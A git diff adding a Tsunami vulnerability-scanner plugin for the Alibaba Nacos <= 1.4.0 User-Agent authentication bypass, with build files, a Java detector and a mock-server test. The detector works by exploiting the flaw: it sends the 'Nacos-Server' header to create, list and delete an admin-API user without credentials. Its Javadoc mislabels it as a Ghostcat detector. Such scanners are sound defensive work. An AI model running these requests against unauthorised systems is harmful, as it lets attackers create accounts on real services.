diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/README.md b/google/detectors/nacos/auth_bypass_lte1.4.0/README.md new file mode 100644 index 000000000..f758c6bf8 --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/README.md @@ -0,0 +1,16 @@ +# Alibaba-Nacos <= 1.4.0 User-Agent authentication bypass vulnerability Detector + +This detector checks for Alibaba-Nacos <= 1.4.0 User-Agent authentication bypass vulnerability. +When the nacos version is less than or equal to 1.4.0, when accessing the http endpoint, +adding the User-Agent: Nacos-Server header can bypass the authentication restriction and access any http endpoint. +https://github.com/alibaba/nacos/issues/4593 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/build.gradle b/google/detectors/nacos/auth_bypass_lte1.4.0/build.gradle new file mode 100644 index 000000000..7c97c5d80 --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/build.gradle @@ -0,0 +1,70 @@ +plugins { + id 'java' +} + +group 'com.google.tsunami' +version '1.0-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_1_8 + targetCompatibility = JavaVersion.VERSION_1_8 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + source = '8' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + okhttpVersion = '3.12.0' + autoValueVersion = '1.7' + tsunamiVersion = '0.0.3' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.auto.value:auto-value-annotations:${autoValueVersion}" + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + annotationProcessor "com.google.auto.value:auto-value:${autoValueVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} \ No newline at end of file diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/gradle/wrapper/gradle-wrapper.jar b/google/detectors/nacos/auth_bypass_lte1.4.0/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..7454180f2 Binary files /dev/null and b/google/detectors/nacos/auth_bypass_lte1.4.0/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/gradle/wrapper/gradle-wrapper.properties b/google/detectors/nacos/auth_bypass_lte1.4.0/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..69a971507 --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,5 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.1-bin.zip +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/gradlew b/google/detectors/nacos/auth_bypass_lte1.4.0/gradlew new file mode 100755 index 000000000..744e882ed --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/gradlew @@ -0,0 +1,185 @@ +#!/usr/bin/env sh + +# +# Copyright 2015 the original author or authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +## +## Gradle start up script for UN*X +## +############################################################################## + +# Attempt to set APP_HOME +# Resolve links: $0 may be a link +PRG="$0" +# Need this for relative symlinks. +while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG=`dirname "$PRG"`"/$link" + fi +done +SAVED="`pwd`" +cd "`dirname \"$PRG\"`/" >/dev/null +APP_HOME="`pwd -P`" +cd "$SAVED" >/dev/null + +APP_NAME="Gradle" +APP_BASE_NAME=`basename "$0"` + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD="maximum" + +warn () { + echo "$*" +} + +die () { + echo + echo "$*" + echo + exit 1 +} + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "`uname`" in + CYGWIN* ) + cygwin=true + ;; + Darwin* ) + darwin=true + ;; + MSYS* | MINGW* ) + msys=true + ;; + NONSTOP* ) + nonstop=true + ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD="java" + which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." +fi + +# Increase the maximum file descriptors if we can. +if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then + MAX_FD_LIMIT=`ulimit -H -n` + if [ $? -eq 0 ] ; then + if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then + MAX_FD="$MAX_FD_LIMIT" + fi + ulimit -n $MAX_FD + if [ $? -ne 0 ] ; then + warn "Could not set maximum file descriptor limit: $MAX_FD" + fi + else + warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" + fi +fi + +# For Darwin, add options to specify how the application appears in the dock +if $darwin; then + GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" +fi + +# For Cygwin or MSYS, switch paths to Windows format before running java +if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then + APP_HOME=`cygpath --path --mixed "$APP_HOME"` + CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` + + JAVACMD=`cygpath --unix "$JAVACMD"` + + # We build the pattern for arguments to be converted via cygpath + ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` + SEP="" + for dir in $ROOTDIRSRAW ; do + ROOTDIRS="$ROOTDIRS$SEP$dir" + SEP="|" + done + OURCYGPATTERN="(^($ROOTDIRS))" + # Add a user-defined pattern to the cygpath arguments + if [ "$GRADLE_CYGPATTERN" != "" ] ; then + OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" + fi + # Now convert the arguments - kludge to limit ourselves to /bin/sh + i=0 + for arg in "$@" ; do + CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` + CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option + + if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition + eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` + else + eval `echo args$i`="\"$arg\"" + fi + i=`expr $i + 1` + done + case $i in + 0) set -- ;; + 1) set -- "$args0" ;; + 2) set -- "$args0" "$args1" ;; + 3) set -- "$args0" "$args1" "$args2" ;; + 4) set -- "$args0" "$args1" "$args2" "$args3" ;; + 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; + 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; + 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; + 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; + 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; + esac +fi + +# Escape application args +save () { + for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done + echo " " +} +APP_ARGS=`save "$@"` + +# Collect all arguments for the java command, following the shell quoting and substitution rules +eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" + +exec "$JAVACMD" "$@" diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/gradlew.bat b/google/detectors/nacos/auth_bypass_lte1.4.0/gradlew.bat new file mode 100644 index 000000000..107acd32c --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/gradlew.bat @@ -0,0 +1,89 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%" == "" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%" == "" set DIRNAME=. +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if "%ERRORLEVEL%" == "0" goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if "%ERRORLEVEL%"=="0" goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 +exit /b 1 + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/settings.gradle b/google/detectors/nacos/auth_bypass_lte1.4.0/settings.gradle new file mode 100644 index 000000000..26c82f274 --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/settings.gradle @@ -0,0 +1,2 @@ +rootProject.name = 'auth_bypass_lte1.4.0' + diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/src/main/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetector.java b/google/detectors/nacos/auth_bypass_lte1.4.0/src/main/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetector.java new file mode 100644 index 000000000..fdbd9325f --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/src/main/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetector.java @@ -0,0 +1,158 @@ +package com.google.tsunami.plugins.detectors.nacos.auth_bypass_lte140; + +/** + * A {@link VulnDetector} that detects the Ghostcat vulnerability. + */ + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.inject.Inject; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.proto.*; + +import java.io.IOException; +import java.time.Clock; +import java.time.Instant; +import java.util.Random; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static com.google.tsunami.common.net.http.HttpRequest.*; + +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "NacosAuthBypassVulnDetector", + version = "1.0", + description = "This detector checks for Alibaba-Nacos <= 1.4.0 User-Agent authentication bypass vulnerability.", + author = "threedr3am (threedr3am@foxmail.com)", + bootstrapModule = NacosAuthBypassVulnDetectorBootstrapModule.class +) +public class NacosAuthBypassVulnDetector implements VulnDetector { + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private final Clock utcClock; + private final HttpClient httpClient; + + @Inject + NacosAuthBypassVulnDetector(@UtcClock Clock utcClock, HttpClient httpClient) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(NetworkServiceUtils::isWebService) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + int num = new Random().nextInt(Integer.MAX_VALUE); + String username = "user_" + num; + String password = "pass_" + num; + + HttpHeaders httpHeaders = HttpHeaders.builder() + .addHeader("User-Agent", "Nacos-Server") + .build(); + + // 1. create random user + String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + + String.format("nacos/v1/auth/users?username=%s&password=%s", username, password); + try { + HttpResponse response = httpClient.send(post(targetUri).setHeaders(httpHeaders).build(), + networkService); + try { + if (response.status() != HttpStatus.OK || !response.bodyString().isPresent()) { + return false; + } + if (!response.bodyString().get().contains("create user ok!")) { + return false; + } + } catch (Throwable t) { + logger.atInfo().log("Failed to parse cores response json"); + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + } + + // 2. check user exist + String targetUri2 = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + + "nacos/v1/auth/users?pageNo=1&pageSize=999"; + try { + HttpResponse response = httpClient.send(get(targetUri2).setHeaders(httpHeaders).build(), + networkService); + try { + if (response.status() != HttpStatus.OK || !response.bodyString().isPresent()) { + return false; + } + if (!response.bodyString().get().contains(username)) { + return false; + } + } catch (Throwable t) { + logger.atInfo().log("Failed to parse cores response json"); + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + } + + // 3. recover + String targetUri3 = NetworkServiceUtils.buildWebApplicationRootUrl(networkService) + + String.format("nacos/v1/auth/users?username=%s", username); + try { + HttpResponse response = httpClient.send(delete(targetUri3).setHeaders(httpHeaders).build(), + networkService); + try { + if (response.status() != HttpStatus.OK || !response.bodyString().isPresent()) { + return false; + } + if (response.bodyString().get().contains("delete user ok!")) { + return true; + } + } catch (Throwable t) { + logger.atInfo().log("Failed to parse cores response json"); + } + } catch (IOException e) { + logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri); + } + return false; + } + + public DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder().setPublisher("threedr3am") + .setValue("NACOS-ISSUE #4593")) + .setSeverity(Severity.CRITICAL) + .setTitle("Alibaba-Nacos User-Agent authentication bypass vulnerability") + .setDescription( + "This detector checks for Alibaba-Nacos <= 1.4.0 User-Agent authentication bypass vulnerability." + + "When the nacos version is less than or equal to 1.4.0, when accessing the http endpoint, " + + "adding the User-Agent: Nacos-Server header can bypass the authentication restriction and access any http endpoint." + + "https://github.com/alibaba/nacos/issues/4593") + ) + .build(); + } +} diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/src/main/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetectorBootstrapModule.java b/google/detectors/nacos/auth_bypass_lte1.4.0/src/main/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetectorBootstrapModule.java new file mode 100644 index 000000000..46fd34e40 --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/src/main/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetectorBootstrapModule.java @@ -0,0 +1,29 @@ +/* + * Copyright 2020 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.nacos.auth_bypass_lte140; + +import com.google.tsunami.plugin.PluginBootstrapModule; + +/** + * A {@link PluginBootstrapModule} for {@link NacosAuthBypassVulnDetector}. + */ +public final class NacosAuthBypassVulnDetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + registerPlugin(NacosAuthBypassVulnDetector.class); + } +} diff --git a/google/detectors/nacos/auth_bypass_lte1.4.0/src/test/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetectorTest.java b/google/detectors/nacos/auth_bypass_lte1.4.0/src/test/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetectorTest.java new file mode 100644 index 000000000..9d9d5d6f6 --- /dev/null +++ b/google/detectors/nacos/auth_bypass_lte1.4.0/src/test/java/com/google/tsunami/plugins/detectors/nacos/auth_bypass_lte140/NacosAuthBypassVulnDetectorTest.java @@ -0,0 +1,116 @@ +package com.google.tsunami.plugins.detectors.nacos.auth_bypass_lte140; + +import com.google.common.collect.ImmutableList; +import com.google.inject.Guice; +import com.google.inject.Inject; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.net.http.HttpStatus; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.proto.*; +import okhttp3.mockwebserver.Dispatcher; +import okhttp3.mockwebserver.MockResponse; +import okhttp3.mockwebserver.MockWebServer; +import okhttp3.mockwebserver.RecordedRequest; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; + +import java.io.IOException; +import java.time.Instant; +import java.util.regex.Matcher; +import java.util.regex.Pattern; + +import static com.google.common.truth.Truth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; + +public class NacosAuthBypassVulnDetectorTest { + + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + @Inject + private NacosAuthBypassVulnDetector detector; + + private MockWebServer mockWebServer; + + @Before + public void setUp() { + mockWebServer = new MockWebServer(); + } + + @After + public void tearDown() throws IOException { + mockWebServer.shutdown(); + } + + private void createInjector() { + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new HttpClientModule.Builder().build()) + .injectMembers(this); + } + + @Test + public void testAuthBypass() + throws IOException { + createInjector(); + mockWebServer.setDispatcher(new VulnerableEndpointDispatcher()); + mockWebServer.start(); + + ImmutableList httpServices = ImmutableList.of( + NetworkService.newBuilder() + .setNetworkEndpoint( + forHostnameAndPort(mockWebServer.getHostName(), mockWebServer.getPort())) + .setTransportProtocol(TransportProtocol.TCP) + .setServiceName("http") + .build()); + + TargetInfo targetInfo = buildTargetInfo(forHostname(mockWebServer.getHostName())); + DetectionReportList detectionReports = detector.detect(targetInfo, httpServices); + + assertThat(detectionReports.getDetectionReportsList()).containsExactly( + detector.buildDetectionReport(targetInfo, httpServices.get(0))); + assertThat(mockWebServer.getRequestCount()).isEqualTo(3); + } + + + static final class VulnerableEndpointDispatcher extends Dispatcher { + + private String username; + + private Pattern pattern = Pattern.compile("username=(.+?)&"); + + @Override + public MockResponse dispatch(RecordedRequest recordedRequest) { + if (recordedRequest.getPath().startsWith("/nacos/v1/auth/users")) { + if (recordedRequest.getMethod().equals("POST")) { + Matcher matcher = pattern.matcher(recordedRequest.getPath()); + boolean match = matcher.find(); + if (!match) { + matcher = pattern.matcher(recordedRequest.getUtf8Body()); + match = matcher.find(); + } + if (match) { + this.username = matcher.group(1); + } else { + return new MockResponse().setResponseCode(HttpStatus.OK.code()); + } + return new MockResponse().setResponseCode(HttpStatus.OK.code()) + .setBody("create user ok!"); + } else if (recordedRequest.getMethod().equals("GET")) { + return new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(username); + } else if (recordedRequest.getMethod().equals("DELETE")) { + return new MockResponse().setResponseCode(HttpStatus.OK.code()) + .setBody("delete user ok!"); + } + } + return new MockResponse().setResponseCode(HttpStatus.OK.code()); + } + } + + private static TargetInfo buildTargetInfo(NetworkEndpoint networkEndpoint) { + return TargetInfo.newBuilder().addNetworkEndpoints(networkEndpoint).build(); + } +}